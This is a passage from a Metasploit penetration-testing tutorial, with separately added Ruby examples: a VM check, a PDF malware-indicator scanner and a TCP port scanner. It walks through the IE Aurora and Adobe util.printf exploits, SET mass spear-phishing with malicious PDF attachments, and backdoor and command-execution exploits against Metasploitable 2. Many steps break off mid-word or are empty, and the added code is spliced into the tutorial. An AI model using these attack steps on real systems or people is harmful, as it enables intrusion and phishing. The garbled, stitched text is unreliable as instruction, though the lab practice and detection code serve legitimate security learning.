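  ifaces = client.net.config.interfaces.map { |i| { name: i.mac_name, mac: i.mac_addr } }
  procs  = client.sys.process.get_processes.map { |p| p["name"] }
  found  = check_vm(ifaces, procs)
  print_status(found ? "Target is a VM: #{found.join(', ')}" : "No VM indicators found")
end
```

Run stand-alone, check_vm(SAMPLE_INTERFACES, SAMPLE_PROCESSES) returns ["VMware"]; the loopback interface's all-zero MAC is handled without a hit, and an unknown MAC format raises rather than silently passing as bare metal.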


      Chapter Nine

      Client Side Exploitation

    Client side attacks were the next evolution of attacks after network defences (firewalls, patched services) became much more robust. These attacks target the software installed on the victim's computer, such as browsers, PDF readers and MS Word. This software is installed on almost every computer, office or personal.

      These attacks have been very successful because of the lack of awareness among users. In a client side attack the attacker delivers the exploit through social engineering: an email attachment or a link. The systems on which the victim opens that file or malicious link will be compromised.

    Countermeasures:

    1. Keep your antivirus and antispyware software updated.
    2. Update your operating system and web browsers on a regular basis.
    3. Update your PDF reader (e.g. Adobe, Foxit), media players and plugins (QuickTime, Flash) and document readers (MS Word).
    4. Do not visit dubious websites.
    5. Download software only from genuine websites, because some websites bundle spyware with the software they offer.
    6. Mozilla and Chrome users can use security addons like WOT (Web Of Trust), NoScript and BetterPrivacy.

    Browser based exploits: In this module our main target is the browser. Now I will demonstrate an infamous exploit, Aurora.

    Internet Explorer Aurora memory corruption:

      This exploit came into the picture in the year 2010 (MS10-002, CVE-2010-0249), when it was used in the "Operation Aurora" attacks on Google and other companies. It is a memory corruption bug (a dangling object pointer) in the way Internet Explorer handles HTML objects, triggered by a crafted web page.


    Demo Time

    Step 1: use exploit/windows/browser/ms10_002_aurora

    Type show options to view the different options. We have to set SRV


    Step 3

    1) I am setting L


     2. When I open that link in the browser, the Aurora exploit starts working.

     3. You can see my Windows system has been compromised.

     4. You are greeted with a meterpreter shell.

    This exploit has worked flawlessly on Internet Explorer 6, the version the Metasploit module targets, and IE 6 itself is long out of support. So it is better to update your browser.


    File format exploits

      File format exploits are the next generation of client-side exploits. In this method we send a file such as a pdf or doc document to the target; when the target opens that file in a vulnerable reader, their system is compromised.

    Demo Time: Adobe util.printf() buffer overflow vulnerability:

    There is a stack buffer overflow in the JavaScript util.printf() function of Adobe Reader and Adobe Acrobat version 8.1.2 and earlier (CVE-2008-2992). By creating a specially crafted pdf carrying JavaScript we can exploit the target system. You can read more about this vulnerability at the link below.

    http://www.metasploit.com/modules/exploit/windows/fileformat/adobe_utilprintf

    Step 1: use exploit/windows/fileformat/adobe_utilprintf

    I am using the adobe_utilprintf exploit. Type show options to view the different options.

    Step 2: Change the file name. Usage: set FILENAME book.pdf


    Step 3: Set a meterpreter payload, and fill L


    Step 5:

    Usage: set L
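As an added example from the defender's side (not the guide's text and not Metasploit's code), the following Ruby scans a PDF for the static indicators a file like the one generated above leaves behind: an automatic action (/OpenAction or /AA) that fires JavaScript, the /JavaScript and /JS entries themselves, and a call to util.printf inside the script. It inflates FlateDecode streams with Zlib and undoes the #xx hex escapes PDF allows in names (a common trick for hiding /JavaScript from a naive grep), because both would otherwise hide the strings from a plain search. The PDFs it is run on are constructed inside the block; they are minimal and are not exploit files.

```ruby
require "zlib"

# Added example: static indicators of a JavaScript-bearing PDF.
# Pipeline order matters: inflate compressed streams first, then normalise
# name escapes, then search. A full triage tool (pdfid, peepdf) also handles
# object streams, encryption and the other stream filters.

INDICATORS = {
  "OpenAction"  => /\/OpenAction\b/,     # runs an action when the document opens
  "AA"          => /\/AA\b/,             # additional actions (page open, mouse events)
  "JavaScript"  => /\/JavaScript\b/,
  "JS"          => /\/JS\b/,
  "util.printf" => /util\.printf\s*\(/,  # the API abused by CVE-2008-2992
  "Launch"      => /\/Launch\b/,         # launches an external program
}.freeze

# Replace each "stream ... endstream" body with its inflated form when the
# body is a zlib stream (the /FlateDecode filter); leave other bodies alone.
def inflate_streams(data)
  data.b.gsub(/(?<!end)stream\r?\n(.*?)\r?\nendstream/m) do
    body = $1
    begin
      Zlib::Inflate.inflate(body)
    rescue Zlib::Error
      body
    end
  end
end

# PDF names may spell any character as #xx, so /Java#53cript is /JavaScript.
def normalize_names(data)
  data.b.gsub(/#(\h{2})/) { $1.hex.chr }
end

# Returns the names of the indicators found, in INDICATORS order.
def scan_pdf(bytes)
  text = normalize_names(inflate_streams(bytes))
  INDICATORS.select { |_, re| text.match?(re) }.keys
end

# Triage verdict: JavaScript wired to an automatic action is exactly what a
# util.printf style exploit needs, so rank that above a lone /JS entry.
def verdict(bytes)
  hits = scan_pdf(bytes)
  auto = hits.include?("OpenAction") || hits.include?("AA")
  js   = hits.include?("JS") || hits.include?("JavaScript")
  if js && auto then :high
  elsif js || hits.include?("Launch") then :medium
  else :clean
  end
end

# Constructed samples (not real exploit files). The malicious one hides the
# action name with a hex escape and compresses the script with FlateDecode.
def build_sample_pdf(js, compress: true, escape_names: true)
  body   = compress ? Zlib::Deflate.deflate(js) : js
  filter = compress ? " /Filter /FlateDecode" : ""
  jsname = escape_names ? "/Java#53cript" : "/JavaScript"
  <<~PDF.b
    %PDF-1.4
    1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj
    2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj
    3 0 obj << /Type /Action /S #{jsname} /JS 4 0 R >> endobj
    4 0 obj << /Length #{body.bytesize}#{filter} >>
    stream
    #{body}
    endstream
    endobj
    %%EOF
  PDF
end

MALICIOUS_PDF = build_sample_pdf('var s = "A"; util.printf("%s", s);')
BENIGN_PDF    = "%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n%%EOF\n".b
```

scan_pdf(MALICIOUS_PDF) returns ["OpenAction", "JavaScript", "JS", "util.printf"] and verdict(MALICIOUS_PDF) is :high; the benign catalog-only file yields an empty list and :clean. Attachments that hit :high are worth detonating in a sandbox rather than opening, regardless of which reader version is installed.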


      Chapter Ten

      Social Engineering Toolkit (SET)

      Social engineering is the art of manipulating people into performing actions or divulging confidential information like passwords.

      SET was developed by David Kennedy in the Python language with the help of the security community. The main aim of SET is to fill a gap in penetration testing and to bring awareness about social engineering attacks. A firewall or network intrusion detection system cannot stop a social engineering attack, because in social engineering the weakest link in the security chain is the human.

      The attacks built into this toolkit are designed to attack a person or an organization. The toolkit has several modules; in this tutorial I will perform a spear-phishing attack.

    Spear-phishing module:

      This module allows you to craft email messages and send them to a large number of people or to a single email address. In this attack we use file format exploits: we send an email to a person with an attachment such as a malicious PDF or a zip file. When the victim opens the attachment their system is compromised and we get a shell on it.


    Steps: cd /pentest/exploits/set && ./set

    (/pentest/exploits/set is where BackTrack installed SET; on Kali it is started with the setoolkit command.)

    Step 2: Choose the spear-phishing attack vector. You can see that various other modules are also available; try them all yourself. The Social Engineering Toolkit is very easy to use: there are no commands to remember, it is driven entirely by numbered menus.


    Step 3: Choose the "perform a mass email attack" option; it displays the various file format exploits.

    Step 4: We select the Adobe Reader buffer overflow vulnerability. You can see that the available payloads are listed according to the chosen exploit.

    Step 5: The payload has been generated. Now choose the first option to keep the same file name, or else give it your preferred name.


    Step 7:


    Step 8:


      Chapter Eleven

      Auxiliary Modules

      Auxiliary modules are not exploits. When we hear about Metasploit we always think about how to get a shell on a remote system, but in pentesting we also have to do many other tasks, like scanning the remote host, finding open ports, and checking server configuration and misconfiguration.

    In the Metasploit framework we have more than 560 auxiliary modules, which include

    1) Scanners

    2) Fuzzers

    3)


    Port scanners:

      Port scanners are used to see which ports are open on the target system. Now I am using a TCP port scanner to find the open ports on my Windows XP system. This module completes a full TCP connection to every port, so it is reliable but not stealthy (each connection is visible to the service and its logs); it is most useful where nmap cannot run, for example from inside a pivot.

    Usage: use auxiliary/scanner/portscan/tcp

    Type show options to view the available options (RHOSTS for the targets, PORTS, THREADS and TIMEOUT).

    Set the remote ip address: set R
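As an added example (not the guide's text and not Metasploit's module code), the following Ruby does what auxiliary/scanner/portscan/tcp does underneath: a threaded TCP connect scan with a connect timeout, classifying each port as open (handshake completed), closed (connection refused) or filtered (timeout or unreachable), which is how to read a port that is missing from the module's output. The demonstration scans the loopback interface against a listener it opens itself, so it runs without any target; the function names and the port-spec parser are mine.

```ruby
require "socket"

# Added example: a TCP connect port scanner in plain Ruby, mirroring
# auxiliary/scanner/portscan/tcp (PORTS, RHOSTS, THREADS, TIMEOUT options).
# A completed connect is visible to the target service, so this is reliable
# but not stealthy.

# One probe. :open means the three-way handshake completed; :closed means
# the target answered with RST (connection refused); :filtered means no
# answer within the timeout or an unreachable route, typically a firewall.
def probe_port(host, port, timeout = 1.0)
  Socket.tcp(host, port, connect_timeout: timeout) { |_sock| :open }
rescue Errno::ECONNREFUSED
  :closed
rescue IOError, SystemCallError
  :filtered
end

# Scan `ports` on `host` with a pool of worker threads; returns a Hash
# {port => state} sorted by port number.
def scan_ports(host, ports, threads: 10, timeout: 1.0)
  queue = Queue.new
  ports.each { |p| queue << p }
  results = {}
  lock = Mutex.new
  workers = Array.new([threads, 1].max) do
    Thread.new do
      loop do
        port = begin
          queue.pop(true)              # non-blocking; ThreadError when empty
        rescue ThreadError
          break
        end
        state = probe_port(host, port, timeout)
        lock.synchronize { results[port] = state }
      end
    end
  end
  workers.each(&:join)
  results.sort.to_h
end

# Just the open ports, as the module prints them.
def open_ports(host, ports, **opts)
  scan_ports(host, ports, **opts).select { |_, state| state == :open }.keys
end

# Parse "22,80,443" or "1-1024" style port specs as the PORTS option does.
def parse_ports(spec)
  spec.split(",").flat_map do |part|
    first, last = part.strip.split("-", 2).map(&:to_i)
    last ? (first..last).to_a : [first]
  end.uniq.sort
end

# Self-contained demonstration: listen on an ephemeral loopback port, pick
# another port that is certainly closed, and scan both.
def demo_scan
  listener = TCPServer.new("127.0.0.1", 0)
  open_port = listener.addr[1]
  probe = TCPServer.new("127.0.0.1", 0)
  closed_port = probe.addr[1]
  probe.close                            # nothing listens there any more
  scan_ports("127.0.0.1", [open_port, closed_port], threads: 2)
ensure
  listener&.close
end
```

demo_scan returns a hash with one :open and one :closed entry. Against a real host the :filtered state is the interesting one: a port that neither accepts nor refuses is usually behind a firewall, and a scan that lists only open ports (as the module does) silently merges it with closed.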


    Scanning for NetBIOS (auxiliary/scanner/netbios/nbname):

    1. Set remote hosts: set R


    Setting rhost: set R


      Chapter Twelve

      Linux exploitation

      So far you have seen Windows exploitation. Now I will show you how to exploit a Linux operating system. In this chapter we use Metasploitable 2, an intentionally vulnerable Ubuntu Linux based operating system built by the Metasploit developers so that security professionals can practise their tools against it.

      It also hosts the vulnerable web applications Mutillidae and DVWA (Damn Vulnerable Web Application), which contain the OWASP Top 10 vulnerabilities and many more. You can download Metasploitable 2 from the link below.

    https://sourceforge.net/projects/metasploitable/files/Metasploitable2/

      After downloading it, import it into VMware. Keep it on a host-only or NAT network and never expose it to an untrusted network: anyone who can reach it can compromise it. After the system boots up, log in to Metasploitable 2 with the username msfadmin and the password msfadmin.

      First we have to know its IP address: just type ifconfig on it. Then go to your BackTrack machine and use nmap to scan the open ports and services, to learn which services are running on the Metasploitable 2 machine.


    Scanning with nmap: We use nmap to scan for open ports and the services running on them.

    Usage: nmap -sT 192.168.217.136 (Metasploitable ip address); add -sV to fingerprint service versions, which is what tells us that the IRC daemon is UnrealIRCd 3.2.8.1.

    You can see many services running. Now I will choose an exploit for the UnrealIRCd IRC daemon. This version (3.2.8.1, the one shipped on Metasploitable 2) contains a backdoor, and it is listening on port 6667.

    Now search for this exploit:

    Usage: search unrealircd

    You can see that only one exploit is available, and that its rank is excellent.


    Step 1: use exploit/unix/irc/unreal_ircd_3281_backdoor

    Type show options to view the available options.

    Step 2: set R


    Exploit 2:

    distcc_exec: distcc is a program that makes it easy to distribute large compile jobs across several machines; the distcc daemon on Metasploitable 2 accepts jobs from anyone on the network, so it runs arbitrary commands for us. You can read more about this exploit at the link below.

    http://metasploit.com/modules/exploit/unix/misc/distcc_exec

    Step 1: use exploit/unix/misc/distcc_exec

    Step 2: Type exploit


    Exploit 3:

    usermap_script: This is a command execution vulnerability in Samba (CVE-2007-2447, versions 3.0.0 to 3.0.25rc3; Metasploitable 2 runs 3.0.20): the "username map script" option passes the supplied username to a shell without escaping, so shell metacharacters in the username execute commands as root. You can read more about it at the link below.

    http://www.metasploit.com/modules/exploit/multi/samba/usermap_script

    Step 1: use exploit/multi/samba/usermap_script

    Step 2: set R


    Conclusion:

      That's all I have in my mind for this document. I would warmly welcome your feedback (either positive or negative). I need your suggestions, which would help me move further. Thank you very much for reading this document. Practise all the commands so as to gain a confident command over Metasploit. Please do not violate any security rules and do not do any malicious activity with these techniques (I hope you really wouldn't). All techniques which I have mentioned here were executed on my laptop. If you have any queries or concerns please feel free to contact me (my contact details are given below). Finally, I would like to conclude with an excellent quote:

      "There is no security in life, only opportunity."  Mark Twain

    About me: I, Kaleem Shaik, am working as an ASE (Assistant Systems Engineer) in TCS. My areas of interest are Ethical hacking, Penetration Testing and anything and everything in relation to SECURITY.

    Contact Details:

      Name: Kaleem Shaik

      Email: kaleemshaik786@hotmail.com

    Thanks & Regards

      Kaleem Shaik